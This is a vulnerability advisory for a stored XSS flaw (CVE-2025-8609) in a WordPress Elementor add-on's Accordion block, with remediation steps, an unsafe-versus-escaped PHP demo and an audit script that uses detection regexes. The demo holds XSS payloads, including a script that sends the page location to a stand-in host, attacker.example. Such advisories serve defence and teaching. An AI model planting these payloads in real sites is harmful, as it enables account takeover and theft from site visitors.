Overview
A significant security vulnerability, identified as CVE-2025-8609, has been discovered in the RTMKit Addons for Elementor plugin for WordPress. This flaw is a Stored Cross-Site Scripting (XSS) vulnerability that could allow attackers to inject malicious scripts into your website. This vulnerability affects all versions up to and including 1.6.1 of the RTMKit Addons for Elementor plugin.
Technical Details
The vulnerability resides within the Accordion Block of the plugin. Specifically, the issue stems from insufficient input sanitization and output escaping of user-supplied attributes in the Accordion block's settings: values a user types into the block are written into the rendered page markup without being encoded for the HTML context they land in. An authenticated attacker with Contributor-level access or higher can therefore store arbitrary web script in any page that contains the affected Accordion Block. Contributors can create and edit posts but cannot publish them, so the practical attack path is to save the payload into a block and wait for a higher-privileged user to preview, review or publish the post; once the page is published, the script executes in the browser of every visitor who loads it.
The vulnerable code can be seen in the rkit_image_accordion.php file (see reference).
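The bug class is easier to see in code. The snippet below is an added illustration for this advisory, not the plugin's code: the function names `demo_render_accordion_unsafe` and `demo_render_accordion_safe`, the attribute names and the payloads are hypothetical. The stand-in definitions of `esc_attr()`, `esc_html()` and `sanitize_text_field()` are assumptions that approximate the WordPress functions closely enough for the demo to run under plain `php`; inside WordPress the real functions are used.

```php
<?php
// Added example, not the plugin's code. It models the bug class in the advisory
// (block attributes echoed into markup without sanitization or escaping) next to
// the hardened form. All names here are hypothetical.

// Stand-ins (assumptions) so this file runs with plain `php` outside WordPress.
// WordPress' own esc_attr()/esc_html()/sanitize_text_field() take over when loaded.
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($text) { return trim(strip_tags((string) $text)); }
}

// VULNERABLE pattern: attributes a Contributor controls go straight into the markup.
function demo_render_accordion_unsafe(array $atts): string {
    $id      = $atts['id'] ?? 'acc';
    $title   = $atts['title'] ?? '';
    $content = $atts['content'] ?? '';
    return '<div class="accordion" id="' . $id . '">'
         . '<h3 class="accordion-title">' . $title . '</h3>'
         . '<div class="accordion-content">' . $content . '</div>'
         . '</div>';
}

// HARDENED pattern: sanitize when the value is read, escape for the output context.
function demo_render_accordion_safe(array $atts): string {
    $id      = sanitize_text_field($atts['id'] ?? 'acc');
    $title   = sanitize_text_field($atts['title'] ?? '');
    $content = $atts['content'] ?? '';
    return '<div class="accordion" id="' . esc_attr($id) . '">'      // attribute context
         . '<h3 class="accordion-title">' . esc_html($title) . '</h3>' // text context
         // Content is treated as plain text here. If rich HTML must be allowed,
         // pass it through wp_kses_post() (an allow-list filter), never raw.
         . '<div class="accordion-content">' . esc_html($content) . '</div>'
         . '</div>';
}

// Constructed attacker input: one payload per injection context. A Contributor can
// type these into the block settings and save the post as a draft.
$payload = [
    'id'      => 'x" onmouseover="alert(document.domain)',
    'title'   => '<img src=x onerror=alert(document.domain)>',
    'content' => '<script>fetch("https://attacker.example/?c=" + document.location)</script>',
];

echo "UNSAFE:\n" . demo_render_accordion_unsafe($payload) . "\n\n";
echo "SAFE:\n"   . demo_render_accordion_safe($payload)   . "\n";
```

Run it with `php demo.php`. In the UNSAFE output the tags and the injected `onmouseover` handler appear verbatim and would execute in a browser; in the SAFE output the `"` inside the id becomes `&quot;` so the handler never leaves the attribute value, and the `<` of the title and content become `&lt;`. The point to take from it is that each value needs the escaping function for the context it is written into (`esc_attr` for attributes, `esc_html` for element text), and that sanitizing on input alone is not enough.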
CVSS Analysis
- CVE ID: CVE-2025-8609
- Severity: MEDIUM
- CVSS Score: 6.4
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
A CVSS score of 6.4 is medium severity. In the vector, PR:L reflects the Contributor-level account the attacker needs, UI:R reflects that a victim has to load the page where the payload is rendered, and S:C reflects that the injected script runs in the victim's browser rather than within the plugin itself. Because the payload is stored server-side, it fires for every visitor of the affected page, including administrators previewing or reviewing the post. The low privilege needed and the persistence of the payload make this a real risk despite the medium rating.
Possible Impact
A successful exploit of this vulnerability can lead to:
- Account Takeover: the script runs with the privileges of whoever views the page. WordPress marks its authentication cookies HttpOnly, so they usually cannot be read directly, but the script can still issue authenticated requests from the victim's browser (for example to the REST API, using the nonces present on admin pages) to create an administrator account or install a backdoor.
- Malware Distribution: Inject malicious code to redirect users to phishing sites or distribute malware.
- Website Defacement: Modify website content, causing reputational damage.
- Data Theft: Attempt to steal sensitive data displayed on the affected pages.
Mitigation and Patch Steps
The recommended course of action is to update the RTMKit Addons for Elementor plugin to the latest version immediately. All versions up to and including 1.6.1 are affected, so the fix is carried by a release later than 1.6.1; confirm this against the plugin's changelog before relying on it.
To update the plugin:
- Log in to your WordPress admin dashboard.
- Navigate to “Plugins” -> “Installed Plugins”.
- Locate the “RTMKit Addons for Elementor” plugin.
- Click the “Update Now” button if an update is available.
If an update is not available, deactivate the plugin until a fixed version is released. Updating prevents new injections but does not remove payloads already stored: review Accordion blocks in posts created or edited by Contributor-level accounts, including drafts and posts pending review, and remove anything suspicious. Consider whether Contributor-level accounts need the plugin's blocks at all. Regular review of the site's security posture is recommended regardless.
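The version check and the review of stored content can be scripted. The helper below is added here for this advisory and is not part of the plugin or the advisory text. It runs inside WordPress with WP-CLI (`wp eval-file rtmkit_audit.php`) or with plain `php` against constructed sample data. Assumptions: the plugin is identified by matching "RTMKit" in its Name header rather than by a slug, the `_elementor_data` post meta is where Elementor keeps per-post widget settings on the site, and the regular expressions are heuristics whose hits must be reviewed by hand.

```php
<?php
// Added audit helper; not the plugin's code and not from the advisory. Run with
// `wp eval-file rtmkit_audit.php` inside WordPress, or with plain `php` to
// exercise the pure functions on constructed sample data. Assumptions: plugin
// matched by "RTMKit" in its Name header; regexes are heuristics.

const RTMKIT_DEMO_LAST_VULNERABLE = '1.6.1'; // advisory: versions <= 1.6.1 affected

// True when an installed version falls inside the affected range.
function rtmkit_demo_version_is_vulnerable(string $installed): bool {
    return version_compare($installed, RTMKIT_DEMO_LAST_VULNERABLE, '<=');
}

// Heuristic scan of stored content for markup a Contributor should never be able
// to save. Block and widget settings are stored as JSON, so common JSON escapes
// are undone first. Returns the labels of the patterns that matched.
function rtmkit_demo_find_suspicious_markup(string $stored): array {
    $html = str_ireplace(['\u003c', '\u003e', '\\"'], ['<', '>', '"'], $stored);
    $patterns = [
        'script-tag'     => '/<\s*script\b/i',
        'inline-event'   => '/\bon[a-z]+\s*=/i',                  // onerror=, onload=, ...
        'javascript-url' => '/\b(?:href|src)\s*=\s*["\']?\s*javascript:/i',
    ];
    $hits = [];
    foreach ($patterns as $label => $re) {
        if (preg_match($re, $html)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

if (defined('ABSPATH')) {
    // Inside WordPress: report the installed plugin version, then scan stored content.
    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    foreach (get_plugins() as $file => $data) {
        if (stripos($data['Name'], 'RTMKit') === false) {
            continue;
        }
        $state = rtmkit_demo_version_is_vulnerable($data['Version']) ? 'VULNERABLE' : 'outside affected range';
        echo "$file (version {$data['Version']}): $state\n";
    }

    global $wpdb;
    // post_content covers block-editor posts; _elementor_data (assumption: Elementor's
    // per-post settings meta) covers Elementor widgets. Drafts and pending posts are
    // included because that is where a Contributor's payload waits for review.
    $rows = $wpdb->get_results(
        "SELECT p.ID, p.post_author, p.post_content, m.meta_value AS elementor_data
           FROM {$wpdb->posts} p
      LEFT JOIN {$wpdb->postmeta} m ON m.post_id = p.ID AND m.meta_key = '_elementor_data'
          WHERE p.post_status IN ('publish', 'draft', 'pending', 'future', 'private')"
    );
    foreach ($rows as $row) {
        $hits = rtmkit_demo_find_suspicious_markup($row->post_content . "\n" . (string) $row->elementor_data);
        if ($hits) {
            echo "post {$row->ID} (author {$row->post_author}): " . implode(', ', $hits) . "\n";
        }
    }
} else {
    // Stand-alone run on constructed sample data.
    foreach (['1.5.0', '1.6.1', '1.6.2'] as $v) {
        printf("%s: %s\n", $v, rtmkit_demo_version_is_vulnerable($v) ? 'vulnerable' : 'outside affected range');
    }
    $clean   = '<!-- wp:paragraph --><p>Quarterly update</p><!-- /wp:paragraph -->';
    $tainted = '{"title":"FAQ","content":"\u003cimg src=x onerror=alert(1)\u003e"}';
    var_dump(rtmkit_demo_find_suspicious_markup($clean));
    var_dump(rtmkit_demo_find_suspicious_markup($tainted));
}
```

Treat every hit as a lead, not a verdict: legitimate content can contain text such as `one=` that trips the inline-event pattern, and a payload that uses an encoding the normalisation does not undo will be missed. The useful signal is a hit in a post whose author is a Contributor-level account, and the remediation is to edit the block settings and remove the injected value after the plugin has been updated.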
